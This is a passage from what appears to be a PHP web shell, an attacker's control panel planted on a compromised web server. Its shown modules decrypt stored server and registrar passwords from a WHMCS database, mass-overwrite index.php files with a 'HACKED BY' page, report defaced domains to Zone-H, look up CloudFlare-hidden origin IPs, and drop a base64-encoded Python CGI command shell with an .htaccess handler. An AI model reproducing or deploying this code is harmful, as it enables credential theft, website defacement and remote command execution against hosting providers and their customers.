0;\r\n    while ($c < $hash_length)\r\n    {\r\n        $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));\r\n        ++$c;\r\n    }\r\n    $key = $iv;\r\n    $c = 0;\r\n    while ($c < strlen ($string))\r\n    {\r\n        if (($c != 0 AND $c % $hash_length == 0))\r\n        {\r\n            $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));\r\n        }\r\n        $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));\r\n        ++$c;\r\n    }\r\n    return $out;\r\n}\r\n\r\nfunction _hash ($string)\r\n{\r\n    if (function_exists (\'sha1\'))\r\n    {\r\n        $hash = sha1 ($string);\r\n    }\r\n    else\r\n    {\r\n        $hash = md5 ($string);\r\n    }\r\n    $out = \'\';\r\n    $c = 0;\r\n    while ($c < strlen ($hash))\r\n    {\r\n        $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));\r\n        $c += 2;\r\n    }\r\n    return $out;\r\n}\r\n\r\necho "\r\n<br><center><font size=\'5\' color=\'#00ff00\'><b>-=[ WHMCS Decoder ]=-</b></font></center>\r\n<center>\r\n<br>\r\n\r\n<FORM action=\'\'  method=\'post\'>\r\n<input type=\'hidden\' name=\'form_action\' value=\'2\'>\r\n<br>\r\n<table class=tabnet style=width:320px;padding:0 1px;>\r\n<tr><th colspan=2>WHMCS Decoder</th></tr> \r\n<tr><td>db_host </td><td><input type=\'text\' style=\'color:#00ff00;background-color:\' class=\'inputz\' size=\'38\' name=\'db_host\' value=\'localhost\'></td></tr>\r\n<tr><td>db_username </td><td><input type=\'text\' style=\'color:#00ff00;background-color:\' class=\'inputz\' size=\'38\' name=\'db_username\' value=\'\'></td></tr>\r\n<tr><td>db_password</td><td><input type=\'text\' style=\'color:#00ff00;background-color:\' class=\'inputz\' size=\'38\' name=\'db_password\' value=\'\'></td></tr>\r\n<tr><td>db_name</td><td><input type=\'text\' style=\'color:#00ff00;background-color:\' class=\'inputz\' size=\'38\' name=\'db_name\' value=\'\'></td></tr>\r\n<tr><td>cc_encryption_hash</td><td><input style=\'color:#00ff00;background-color:\' type=\'text\' class=\'inputz\' size=\'38\' name=\'cc_encryption_hash\' value=\'\'></td></tr>\r\n<td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class=\'inputzbut\' type=\'submit\' style=\'color:#00ff00;background-color:\'  value=\'Submit\' name=\'Submit\'></td>\r\n</table>\r\n</FORM>\r\n</center>\r\n";\r\n\r\n if($_POST[\'form_action\'] == 2 )\r\n {\r\n //include($file);\r\n $db_host=($_POST[\'db_host\']);\r\n $db_username=($_POST[\'db_username\']);\r\n $db_password=($_POST[\'db_password\']);\r\n $db_name=($_POST[\'db_name\']);\r\n $cc_encryption_hash=($_POST[\'cc_encryption_hash\']);\r\n\r\n\r\n\r\n    $link=mysql_connect($db_host,$db_username,$db_password) ;\r\n        mysql_select_db($db_name,$link) ;\r\n$query = mysql_query("SELECT * FROM tblservers");\r\nwhile($v = mysql_fetch_array($query)) {\r\n$ipaddress = $v[\'ipaddress\'];\r\n$username = $v[\'username\'];\r\n$type = $v[\'type\'];\r\n$active = $v[\'active\'];\r\n$hostname = $v[\'hostname\'];\r\necho("<center><table border=\'1\'>");\r\n$password = decrypt ($v[\'password\'], $cc_encryption_hash);\r\necho("<tr><td>Type</td><td>$type</td></tr>");\r\necho("<tr><td>Active</td><td>$active</td></tr>");\r\necho("<tr><td>Hostname</td><td>$hostname</td></tr>");\r\necho("<tr><td>Ip</td><td>$ipaddress</td></tr>");\r\necho("<tr><td>Username</td><td>$username</td></tr>");\r\necho("<tr><td>Password</td><td>$password</td></tr>");\r\n\r\necho "</table><br><br></center>";\r\n}\r\n\r\n    $link=mysql_connect($db_host,$db_username,$db_password) ;\r\n        mysql_select_db($db_name,$link) ;\r\n$query = mysql_query("SELECT * FROM tblregistrars");\r\necho("<center>Domain Reseller <br><table class=tabnet border=\'1\'>");\r\necho("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");\r\nwhile($v = mysql_fetch_array($query)) {\r\n$registrar     = $v[\'registrar\'];\r\n$setting = $v[\'setting\'];\r\n$value = decrypt ($v[\'value\'], $cc_encryption_hash);\r\nif ($value=="") {\r\n$value=0;\r\n}\r\n$password = decrypt ($v[\'password\'], $cc_encryption_hash);\r\necho("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");\r\n}\r\n}\r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'zone\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=zone" method="post">\r\n\r\n<br><br><center>\r\n<!-- Zone-H -->\r\n<form action="" method=\'POST\'><table><table class=\'tabnet\'><tr>\r\n<td style=\'background-color:#0000;padding-left:10px;\'><tr><tr><th colspan="2"><h2>Zone-H Defacer</h2></th></tr></td></tr><tr><td height=\'45\' colspan=\'2\'><form method="post">\r\n<input type="text" class="inputz" name="defacer" value="Nama Defacer" />\r\n<select name="hackmode" class="inputz" >\r\n<option >------------------------Pilih Salah Satu------------------------</option>\r\n<option value="1">known vulnerability (i.e. unpatched system)</option>\r\n<option value="2" >undisclosed (new) vulnerability</option>\r\n<option value="3" >configuration / admin. mistake</option>\r\n<option value="4" >brute force attack</option>\r\n<option value="5" >social engineering</option>\r\n<option value="6" >Web Server intrusion</option>\r\n<option value="7" >Web Server external module intrusion</option>\r\n<option value="8" >Mail Server intrusion</option>\r\n<option value="9" >FTP Server intrusion</option>\r\n<option value="10" >SSH Server intrusion</option>\r\n<option value="11" >Telnet Server intrusion</option>\r\n<option value="12" >RPC Server intrusion</option>\r\n<option value="13" >Shares misconfiguration</option>\r\n<option value="14" >Other Server intrusion</option>\r\n<option value="15" >SQL Injection</option>\r\n<option value="16" >URL Poisoning</option>\r\n<option value="17" >File Inclusion</option>\r\n<option value="18" >Other Web Application bug</option>\r\n<option value="19" >Remote administrative panel access bruteforcing</option>\r\n<option value="20" >Remote administrative panel access password guessing</option>\r\n<option value="21" >Remote administrative panel access social engineering</option>\r\n<option value="22" >Attack against administrator(password stealing/sniffing)</option>\r\n<option value="23" >Access credentials through Man In the Middle attack</option>\r\n<option value="24" >Remote service password guessing</option>\r\n<option value="25" >Remote service password bruteforce</option>\r\n<option value="26" >Rerouting after attacking the Firewall</option>\r\n<option value="27" >Rerouting after attacking the Router</option>\r\n<option value="28" >DNS attack through social engineering</option>\r\n<option value="29" >DNS attack through cache poisoning</option>\r\n<option value="30" >Not available</option>\r\n</select>\r\n\r\n<select name="reason" class="inputz" >\r\n<option >-------------Pilih Salah Satu---------------</option>\r\n<option value="1" >Heh...just for fun!</option>\r\n<option value="2" >Revenge against that website</option>\r\n<option value="3" >Political reasons</option>\r\n<option value="4" >As a challenge</option>\r\n<option value="5" >I just want to be the best defacer</option>\r\n<option value="6" >Patriotism</option>\r\n<option value="7" >Not available</option>\r\n</select>\r\n<input type="hidden" name="action" value="zone">\r\n<center><textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains">List Of Domains</textarea>\r\n<br /><input class=\'inputzbut\' type="submit" value="Send Now !" name="SendNowToZoneH" /><br></center></table>\r\n</form></td></tr></table></form>\r\n<!-- End Of Zone-H -->\r\n</td></center><br><br>\r\n\r\n<?php\r\necho \'<center>\';\r\n\tob_start();\r\n\t$sub = get_loaded_extensions();\r\n\tif(!in_array("curl", $sub)){die(\'[-] Curl Is Not Supported !! \');}\r\n\t$hacker = $_POST[\'defacer\'];\r\n\t$method = $_POST[\'hackmode\'];\r\n\t$neden = $_POST[\'reason\'];\r\n\t$site = $_POST[\'domain\'];\r\n\t\r\n\tif (empty($hacker)){die ("[-] You Must Fill the Attacker name !");}\r\n\telseif($method == "--------SELECT--------") {die("[-] You Must Select The Method !");}\r\n\telseif($neden == "--------SELECT--------") {die("[-] You Must Select The Reason");}\r\n\telseif(empty($site)) {die("[-] You Must Inter the Sites List ! ");}\r\n\t$i = 0;\r\n\t$sites = explode("\\n", $site);\r\n\twhile($i < count($sites)) \r\n\t{\r\n\t\tif(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];}\r\n\t\tZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);\r\n\t\techo "Site : ".$sites[$i]." Defaced !\\n";\r\n\t\t++$i;\r\n\t}\r\n\techo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";\r\n\r\n\techo \'</center>\';\r\n}\r\n\r\n/////////////////////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'bypass-cf\'))\r\n{\t\r\necho \'\r\n<form method="POST"><br><br>\r\n<center><p align="center" dir="ltr"><b><font size="5" face="Tahoma">+--=[ Bypass\r\n<font color="#CC0000">CloudFlare</font> ]=--+</font></b></p>\r\n<select class="inputz" name="krz">\r\n\t<option>ftp</option>\r\n\t\t<option>direct-conntect</option>\r\n\t\t\t<option>webmail</option>\r\n\t\t\t\t<option>cpanel</option>\r\n</select>\r\n<input class="inputz" type="text" name="target" value="url">\r\n<input class="inputzbut" type="submit" value="Bypass"></center>\r\n\r\n\';\r\n\r\n$target = $_POST[\'target\'];\r\n# Bypass From FTP\r\nif($_POST[\'krz\'] == "ftp") {\r\n$ftp = gethostbyname("ftp."."$target");\r\necho "<br><p align=\'center\' dir=\'ltr\'><font face=\'Tahoma\' size=\'2\' color=\'#00ff00\'>Correct \r\nip is : </font><font face=\'Tahoma\' size=\'2\' color=\'#F68B1F\'>$ftp</font></p>";\r\n} \r\n# Bypass From Direct-Connect\r\nif($_POST[\'krz\'] == "direct-conntect") {\r\n$direct = gethostbyname("direct-connect."."$target");\r\necho "<br><p align=\'center\' dir=\'ltr\'><font face=\'Tahoma\' size=\'2\' color=\'#00ff00\'>Correct \r\nip is : </font><font face=\'Tahoma\' size=\'2\' color=\'#F68B1F\'>$direct</font></p>";\r\n}\r\n# Bypass From Webmail\r\nif($_POST[\'krz\'] == "webmail") {\r\n$web = gethostbyname("webmail."."$target");\r\necho "<br><p align=\'center\' dir=\'ltr\'><font face=\'Tahoma\' size=\'2\' color=\'#00ff00\'>Correct \r\nip is : </font><font face=\'Tahoma\' size=\'2\' color=\'#F68B1F\'>$web</font></p>";\r\n}\r\n# Bypass From Cpanel\r\nif($_POST[\'krz\'] == "cpanel") {\r\n$cpanel = gethostbyname("cpanel."."$target");\r\necho "<br><p align=\'center\' dir=\'ltr\'><font face=\'Tahoma\' size=\'2\' color=\'#00ff00\'>Correct \r\nip is : </font><font face=\'Tahoma\' size=\'2\' color=\'#F68B1F\'>$cpanel</font></p>";\r\n}\r\n}\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\n\r\n\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'hashid\')) {\r\nif(isset($_POST[\'gethash\'])){\r\n\t\t$hash = $_POST[\'hash\'];\r\n\t\tif(strlen($hash)==32){\r\n\t\t\t$hashresult = "MD5 Hash";\r\n\t\t}elseif(strlen($hash)==40){\r\n\t\t\t$hashresult = "SHA-1 Hash/ /MySQL5 Hash";\r\n\t\t}elseif(strlen($hash)==13){\r\n\t\t\t$hashresult = "DES(Unix) Hash";\r\n\t\t}elseif(strlen($hash)==16){\r\n\t\t\t$hashresult = "MySQL Hash / /DES(Oracle Hash)";\r\n\t\t}elseif(strlen($hash)==41){\r\n\t\t\t$GetHashChar = substr($hash, 40);\r\n\t\t\tif($GetHashChar == "*"){\r\n\t\t\t\t$hashresult = "MySQL5 Hash"; \r\n\t\t\t}\t\r\n\t\t}elseif(strlen($hash)==64){\r\n\t\t\t$hashresult = "SHA-256 Hash";\r\n\t\t}elseif(strlen($hash)==96){\r\n\t\t\t$hashresult = "SHA-384 Hash";\r\n\t\t}elseif(strlen($hash)==128){\r\n\t\t\t$hashresult = "SHA-512 Hash";\r\n\t\t}elseif(strlen($hash)==34){\r\n\t\t\tif(strstr($hash, \'$1$\')){\r\n\t\t\t\t$hashresult = "MD5(Unix) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==37){\r\n\t\t\tif(strstr($hash, \'$apr1$\')){\r\n\t\t\t\t$hashresult = "MD5(APR) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==34){\r\n\t\t\tif(strstr($hash, \'$H$\')){\r\n\t\t\t\t$hashresult = "MD5(phpBB3) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==34){\r\n\t\t\tif(strstr($hash, \'$P$\')){\r\n\t\t\t\t$hashresult = "MD5(Wordpress) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==39){\r\n\t\t\tif(strstr($hash, \'$5$\')){\r\n\t\t\t\t$hashresult = "SHA-256(Unix) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==39){\r\n\t\t\tif(strstr($hash, \'$6$\')){\r\n\t\t\t\t$hashresult = "SHA-512(Unix) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==24){\r\n\t\t\tif(strstr($hash, \'==\')){\r\n\t\t\t\t$hashresult = "MD5(Base-64) Hash";\r\n\t\t\t} \t\r\n\t\t}else{\r\n\t\t\t$hashresult = "Hash type not found";\r\n\t\t}\r\n\t}else{\r\n\t\t$hashresult = "Not Hash Entered";\r\n\t}\r\n\t\r\n\t?>\r\n\t<center><br><Br><br>\r\n\t\r\n\t\t<form action="" method="POST">\r\n\t\t<tr>\r\n\t\t<table class="tabnet">\r\n\t\t<th colspan="5">Hash Identification</th>\r\n\t\t<tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td>\t<td><input type="text" name="hash" size=\'60\' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>\r\n\t\t<tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>\r\n\t</table></tr></form>\r\n\t</center>\r\n\t\r\n\t<?php\r\n }\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'python\')) { \r\necho "<center/><br/><b>\r\n +--==[ python  Bypass Exploit ]==--+ \r\n </b><br><br>";\r\n \r\n \r\n    mkdir(\'python\', 0755);\r\n    chdir(\'python\');\r\n        $kokdosya = ".htaccess";\r\n        $dosya_adi = "$kokdosya";\r\n        $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;&#305;lamad&#305;!");\r\n        $metin = "AddHandler cgi-script .izo";    \r\n        fwrite ( $dosya , $metin ) ;\r\n        fclose ($dosya);\r\n$pythonp = \'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi\';\r\n\r\n$file = fopen("python.izo" ,"w+");\r\n$write = fwrite ($file ,base64_decode($pythonp));\r\nfclose($file);\r\n    chmod("python.izo",0755);\r\n   echo " <iframe src=python/python.izo width=96% height=76% frameborder=0></iframe>\r\n \r\n </div>"; }\r\n\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'string\')){\r\n$text = $_POST[\'code\'];\r\n?><center><br><br><b>+--=[ Script Encode & Decode ]=--+</b><br><br>\r\n<form method="post"><br><br><br>\r\n<textarea class=\'inputz\' cols=80 rows=10 name="code"></textarea><br><br>\r\n<select class=\'inputz\' size="1" name="ope">\r\n<option value="base64">Base64</option>\r\n<option value="gzinflate">str_rot13 - gzinflate - base64</option>\r\n<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>\r\n</select>&nbsp;<input class=\'inputzbut\' type=\'submit\' name=\'submit\' value=\'Encrypt\'>\r\n<input class=\'inputzbut\' type=\'submit\' name=\'submits\' value=\'Decrypt\'>\r\n</form>\r\n\r\n<?php \r\n$submit = $_POST[\'submit\'];\r\nif (isset($submit)){\r\n$op = $_POST["ope"];\r\nswitch ($op) {case \'base64\': $codi=base64_encode($text);\r\nbreak;case \'str\' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));\r\nbreak;case \'gzinflate\' : $codi=base64_encode(gzdeflate(str_rot13($text)));\r\nbreak;default:break;}}\r\n\r\n$submit = $_POST[\'submits\'];\r\nif (isset($submit)){\r\n$op = $_POST["ope"];\r\nswitch ($op) {case \'base64\': $codi=base64_decode($text);\r\nbreak;case \'str\' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));\r\nbreak;case \'gzinflate\' : $codi=str_rot13(gzinflate(base64_decode($text)));\r\nbreak;default:break;}}\r\n\r\necho \'<textarea cols=80 rows=10 class="inputz" readonly>\'.$codi.\'</textarea></center><BR><BR>\';\r\n\r\n}\r\n\r\n/////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mass\'))\r\n{\r\necho "<center/><br/><b><font color=#00ff00>-=[ Mass Deface ]=-</font></b><br>";\r\nerror_reporting(0);?>\r\n<form ENCTYPE="multipart/form-data" action="<?php $_SERVER[\'PHP_SELF\']?>" method=\'post\'>\r\n<td><table><table class="tabnet" >\r\n<form hethot=\'post\'>\r\n<tr>\r\n\t<tr>\r\n\t<td>&nbsp;&nbsp;Folder</td><td><input class =\'inputz\' type=\'text\' name=\'path\' size=\'60\' value="<?php echo getcwd();?>"></td>\r\n\t</tr><br>\r\n\t<tr>\r\n\t<td>file name</td><td><input class =\'inputz\' type=\'text\' name=\'file\' size=\'60\' value="index.php"></td>\r\n\t</tr>\r\n</tr>\r\n<th colspan=\'2\'><b>Index code</b></th><br></table>\r\n<textarea style=\'background:black;outline:none;\' name=\'index\' rows=\'10\' cols=\'67\'>HACKED BY X\'1N73CT,PATCH YOUR SECURITY SYSTEM</textarea><br>\r\n<center><input class=\'inputzbut\' type=\'submit\' value="&nbsp;&nbsp;Deface&nbsp;&nbsp;"></center></form></table><br></form>\r\n\r\n<?php $mainpath=$_POST[path];$file=$_POST[file];$dir=opendir("$mainpath");$code=base64_encode($_POST[index]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$finish=@fwrite($start,$indx);if ($finish){echo "$row/$file > Done<br><br>";}}}\r\n\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'cgi\')) { \r\necho "<center/><br/><b><font color=blue>+--==[ cgitelnet.v1  Bypass Exploit]==--+ </font></b><br><br>";\r\n mkdir(\'cgitelnet1\', 0755);\r\n    chdir(\'cgitelnet1\');      \r\n        $kokdosya = ".htaccess";\r\n        $dosya_adi = "$kokdosya";\r\n        $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;&#305;lamad&#305;!");\r\n        $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI\r\n\r\nAddType application/x-httpd-cgi .cin\r\n\r\nAddHandler cgi-script .cin\r\nAddHandler cgi-script .cin";    \r\n        fwrite ( $dosya , $metin ) ;\r\n        fclose ($dosya);\r\n$cgishellizocin = 